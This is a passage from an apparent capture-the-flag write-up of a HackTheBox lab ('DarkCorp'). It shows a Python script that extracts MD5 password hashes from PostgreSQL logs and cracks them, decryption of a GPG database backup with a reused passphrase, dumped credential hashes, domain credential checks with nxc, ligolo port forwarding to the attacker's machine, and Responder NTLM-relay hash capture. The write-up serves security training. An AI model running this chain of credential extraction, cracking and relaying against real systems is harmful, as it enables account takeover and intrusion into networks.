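SAMPLE_LOG = """\
2025-02-03 11:05:04.886 MST [5952] postgres@dripmail ERROR:  syntax error at or near "bbd7f88841b4223ae63c8848969be86"
2025-02-03 11:05:04.886 MST [5952] postgres@dripmail STATEMENT:  UPDATE Users SET password = 8bbd7f88841b4223ae63c8848969be86 WHERE username = ebelford;
2025-02-03 11:07:19.102 MST [5960] postgres@dripmail STATEMENT:  UPDATE Users SET password = 21232f297a57a5a743894a0e4a801fc3 WHERE username = testuser;
2025-02-03 11:09:00.000 MST [5961] postgres@dripmail LOG:  checkpoint starting: time
"""

# A failing statement is logged verbatim after "STATEMENT:" (log_min_error_statement=ERROR).
# Quotes around the values are optional so both broken and well-formed UPDATEs match.
STATEMENT_RE = re.compile(
    r'STATEMENT:\s+UPDATE\s+"?Users"?\s+SET\s+password\s*=\s*[\'"]?([0-9a-fA-F]{32})[\'"]?'
    r'\s+WHERE\s+username\s*=\s*[\'"]?(\w+)',
    re.IGNORECASE,
)


def extract_hashes(log_text: str) -> List[Tuple[str, str]]:
    """Return (username, md5hex) for every logged password UPDATE."""
    return [(m.group(2), m.group(1).lower()) for m in STATEMENT_RE.finditer(log_text)]


def crack_md5(targets: Dict[str, str], wordlist: List[str]) -> Dict[str, str]:
    """Unsalted MD5: hash each candidate once and look it up against every target.
    Returns username -> recovered plaintext for the hashes that matched."""
    lookup = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: lookup[h] for user, h in targets.items() if h in lookup}


# ---- what the application should have stored instead ------------------------
ITERATIONS = 600_000  # OWASP's current recommendation for PBKDF2-HMAC-SHA256


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Per-password random salt plus a slow KDF: a leaked digest forces a
    separate brute force per hash, and the same password never repeats."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    _, iters, salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(candidate.hex(), digest_hex)


if __name__ == "__main__":
    found = dict(extract_hashes(SAMPLE_LOG))
    # Constructed wordlist: plaintexts the writeup recovers plus common passwords
    words = ["admin", "123123", "password", "ThePlague61780", "victor1gustavo@#"]
    print(crack_md5(found, words))
```

Run it against the real log with zcat *.gz | python3 this.py after swapping SAMPLE_LOG for sys.stdin.read(); the regex only needs the STATEMENT: lines.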
Running the ligolo agent as ebelford instead of postgres also makes ICMP work:
┌──(root㉿kali)-[/usr/share/responder]
└─# ping 172.16.20.1
PING 172.16.20.1 (172.16.20.1) 56(84) bytes of data.
64 bytes from 172.16.20.1: icmp_seq=1 ttl=64 time=313 ms
64 bytes from 172.16.20.1: icmp_seq=2 ttl=64 time=267 ms
64 bytes from 172.16.20.1: icmp_seq=3 ttl=64 time=185 ms
64 bytes from 172.16.20.1: icmp_seq=4 ttl=64 time=187 ms
64 bytes from 172.16.20.1: icmp_seq=5 ttl=64 time=278 ms
^C
--- 172.16.20.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4004ms
rtt min/avg/max/mdev = 185.184/245.832/312.658/51.272 ms
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders
(limit 70)
-rwxr--r-- 1 postgres postgres 956174 Jan 18 05:08 /tmp/linpeas-mLZiKDMy.sh
-rwxr--r-- 1 postgres postgres 7100304 Jan 18 05:27 /tmp/fscan-eAbbRdOo
-rwxr--r-- 1 postgres postgres 5944464 Jan 18 05:21 /tmp/nmap
-rw------- 1 postgres postgres 835 Jan 18 05:31 /tmp/result.txt
-rw-r--r-- 1 postgres postgres 956174 Jan 18 05:08 /tmp/linpeas-IfofOSGC.sh
-rwxr--r-- 1 postgres postgres 6475928 Jan 18 05:29 /tmp/agent-AVElfFOs
-rw-r--r-- 1 root root 6028 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_progress.bc
-rw-r--r-- 1 root root 4704 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_throttle.bc
-rw-r--r-- 1 root root 19068 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_copy.bc
-rw-r--r-- 1 root root 8320 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_lz4.bc
-rw-r--r-- 1 root root 3668 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_sink.bc
-rw-r--r-- 1 root root 7576 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_target.bc
-rw-r--r-- 1 root root 9048 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_zstd.bc
-rw-r--r-- 1 root root 13456 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/backup_manifest.bc
-rw-r--r-- 1 root root 9912 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_server.bc
-rw-r--r-- 1 root root 44976 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup.bc
-rw-r--r-- 1 root root 7888 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_gzip.bc
-rw-r--r-- 1 root root 5714 Jan 2 2025 /var/backups/alternatives.tar.2.gz
-rw-r--r-- 1 root root 2229 Dec 19 2024 /var/backups/alternatives.tar.5.gz
>>>> -rw-r--r-- 1 postgres postgres 1784 Feb 5 2025 /var/backups/postgres/dev-dripmail.old.sql.gpg
-rw-r--r-- 1 root root 32 Dec 24 2024 /var/backups/dpkg.arch.2.gz
-rw-r--r-- 1 root root 5711 Jan 6 2025 /var/backups/alternatives.tar.1.gz
-rw-r--r-- 1 root root 5714 Jan 1 2025 /var/backups/alternatives.tar.3.gz
-rw-r--r-- 1 root root 32 Dec 20 2024 /var/backups/dpkg.arch.3.gz
-rw-r--r-- 1 root root 32 Dec 19 2024 /var/backups/dpkg.arch.4.gz
-rw-r--r-- 1 root root 81920 Jan 18 00:00 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 0 Jan 18 00:00 /var/backups/dpkg.arch.0
-rw-r--r-- 1 root root 32 Jan 1 2025 /var/backups/dpkg.arch.1.gz
-rw-r--r-- 1 root root 5710 Dec 24 2024 /var/backups/alternatives.tar.4.gz
Running linPEAS, I found /var/backups/postgres/dev-dripmail.old.sql.gpg:
a GPG-encrypted old SQL dump of the dev-dripmail database, readable by our current user postgres.
The gpg output below shows it is encrypted to an RSA key of "postgres <postgres@drip.darkcorp.htb>", whose secret key lives in postgres's keyring (the ~/.gnupg directory seen in an earlier prompt). The database password 2Qa2SsBkQvsc from .env is reused as that key's passphrase,
so I can try it to decrypt the file (set TERM first so the passphrase prompt can render):
postgres@drip$ export TERM=xterm
postgres@drip:/var/backups/postgres$ gpg --batch -d dev-dripmail.old.sql.gpg
gpg: encrypted with 3072-bit RSA key, ID 1112336661D8BC1F, created 2025-01-08
"postgres <postgres@drip.darkcorp.htb>"
--
-- PostgreSQL database dump
--
-- Dumped from database version 15.10 (Debian 15.10-0+deb12u1)
-- Dumped by pg_dump version 15.10 (Debian 15.10-0+deb12u1)
SET statement_timeout = 0;
SET lock_timeout = 0;
SET idle_in_transaction_session_timeout = 0;
SET client_encoding = 'UTF8';
SET standard_conforming_strings = on;
SELECT pg_catalog.set_config('search_path', '', false);
SET check_function_bodies = false;
SET xmloption = content;
SET client_min_messages = warning;
SET row_security = off;
SET default_tablespace = '';
SET default_table_access_method = heap;
--
-- Name: Admins; Type: TABLE; Schema: public; Owner: postgres
--
CREATE TABLE public."Admins" (
id integer NOT NULL,
username character varying(80),
password character varying(80),
email character varying(80)
);
ALTER TABLE public."Admins" OWNER TO postgres;
--
-- Name: Admins_id_seq; Type: SEQUENCE; Schema: public; Owner: postgres
--
CREATE SEQUENCE public."Admins_id_seq"
AS integer
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER TABLE public."Admins_id_seq" OWNER TO postgres;
--
-- Name: Admins_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: postgres
--
ALTER SEQUENCE public."Admins_id_seq" OWNED BY public."Admins".id;
--
-- Name: Users; Type: TABLE; Schema: public; Owner: postgres
--
CREATE TABLE public."Users" (
id integer NOT NULL,
username character varying(80),
password character varying(80),
email character varying(80),
host_header character varying(255),
ip_address character varying(80)
);
ALTER TABLE public."Users" OWNER TO postgres;
--
-- Name: Users_id_seq; Type: SEQUENCE; Schema: public; Owner: postgres
--
CREATE SEQUENCE public."Users_id_seq"
AS integer
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER TABLE public."Users_id_seq" OWNER TO postgres;
--
-- Name: Users_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: postgres
--
ALTER SEQUENCE public."Users_id_seq" OWNED BY public."Users".id;
--
-- Name: Admins id; Type: DEFAULT; Schema: public; Owner: postgres
--
ALTER TABLE ONLY public."Admins" ALTER COLUMN id SET DEFAULT nextval('public."Admins_id_seq"'::regclass);
--
-- Name: Users id; Type: DEFAULT; Schema: public; Owner: postgres
--
ALTER TABLE ONLY public."Users" ALTER COLUMN id SET DEFAULT nextval('public."Users_id_seq"'::regclass);
--
-- Data for Name: Admins; Type: TABLE DATA; Schema: public; Owner: postgres
--
COPY public."Admins" (id, username, password, email) FROM stdin;
>>>> 1 bcase dc5484871bc95c4eab58032884be7225 bcase@drip.htb
>>>> 2 victor.r cac1c7b0e7008d67b6db40c03e76b9c0 victor.r@drip.htb
>>>> 3 ebelford 8bbd7f88841b4223ae63c8848969be86 ebelford@drip.htb
\.
--
-- Data for Name: Users; Type: TABLE DATA; Schema: public; Owner: postgres
--
COPY public."Users" (id, username, password, email, host_header, ip_address) FROM stdin;
5001 support d9b9ecbf29db8054b21f303072b37c4e support@drip.htb Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 10.0.50.10
5002 bcase 1eace53df87b9a15a37fdc11da2d298d bcase@drip.htb Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 10.0.50.10
5003 ebelford 0cebd84e066fd988e89083879e88c5f9 ebelford@drip.htb Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 10.0.50.10
\.
--
-- Name: Admins_id_seq; Type: SEQUENCE SET; Schema: public; Owner: postgres
--
SELECT pg_catalog.setval('public."Admins_id_seq"', 1, true);
--
-- Name: Users_id_seq; Type: SEQUENCE SET; Schema: public; Owner: postgres
--
SELECT pg_catalog.setval('public."Users_id_seq"', 5003, true);
--
-- Name: Admins Admins_pkey; Type: CONSTRAINT; Schema: public; Owner: postgres
--
ALTER TABLE ONLY public."Admins"
ADD CONSTRAINT "Admins_pkey" PRIMARY KEY (id);
--
-- Name: Users Users_pkey; Type: CONSTRAINT; Schema: public; Owner: postgres
--
ALTER TABLE ONLY public."Users"
ADD CONSTRAINT "Users_pkey" PRIMARY KEY (id);
--
-- Name: TABLE "Admins"; Type: ACL; Schema: public; Owner: postgres
--
GRANT SELECT ON TABLE public."Admins" TO dripmail_dba;
--
-- Name: SEQUENCE "Admins_id_seq"; Type: ACL; Schema: public; Owner: postgres
--
GRANT ALL ON SEQUENCE public."Admins_id_seq" TO dripmail_dba;
--
-- Name: TABLE "Users"; Type: ACL; Schema: public; Owner: postgres
--
GRANT SELECT ON TABLE public."Users" TO dripmail_dba;
--
-- Name: SEQUENCE "Users_id_seq"; Type: ACL; Schema: public; Owner: postgres
--
GRANT ALL ON SEQUENCE public."Users_id_seq" TO dripmail_dba;
--
-- PostgreSQL database dump complete
--
postgres@drip:/var/backups/postgres$
This yields three more MD5 hashes:
dc5484871bc95c4eab58032884be7225
cac1c7b0e7008d67b6db40c03e76b9c0
8bbd7f88841b4223ae63c8848969be86
and cracking them gives victor.r@drip.htb's password: victor1gustavo@#
1.5. Internal Status Monitor
This password logs me in to the Internal Status Monitor,
a site that monitors the status of internal hosts.
Seeing this, NTLM relay immediately comes to mind; I have definitely run into something similar before, but I cannot recall it right now.
The credentials are also valid in the domain:
┌──(root㉿kali)-[/usr/share/responder]
└─# nxc smb 172.16.20.1 -u victor.r -p victor1gustavo@#
SMB 172.16.20.1 445 DC-01 [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.16.20.1 445 DC-01 [+] darkcorp.htb\victor.r:victor1gustavo@#
1.5.1. NTLM relay
First I set up Burp (with authentication)
and intercept a request to see what the monitor does.
Then I use ligolo to forward a port on the agent back to my machine:
[Agent : ebelford@drip] » listener_add --tcp --addr 0.0.0.0:8080 --to 10.10.14.86:80
INFO[0085] Listener 0 created on remote agent!
A quick test with nc shows the monitor's fetcher reaching my listener:
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.14.86] from (UNKNOWN) [10.10.14.86] 54606
GET / HTTP/1.1
Host: drip.darkcorp.htb:8080
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Works.
Now use Responder to capture the Net-NTLMv2 hash.
In my case Responder misbehaved and I could not capture the Net-NTLMv2 hash myself; when it works, the output looks like this:
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.10.11.54
[HTTP] NTLMv2 Username : darkcorp\svc_acc
[HTTP] NTLMv2 Hash : svc_acc::darkcorp:ffdb62442934ec... (truncated)
With luck you get a hash like this, but it does not crack.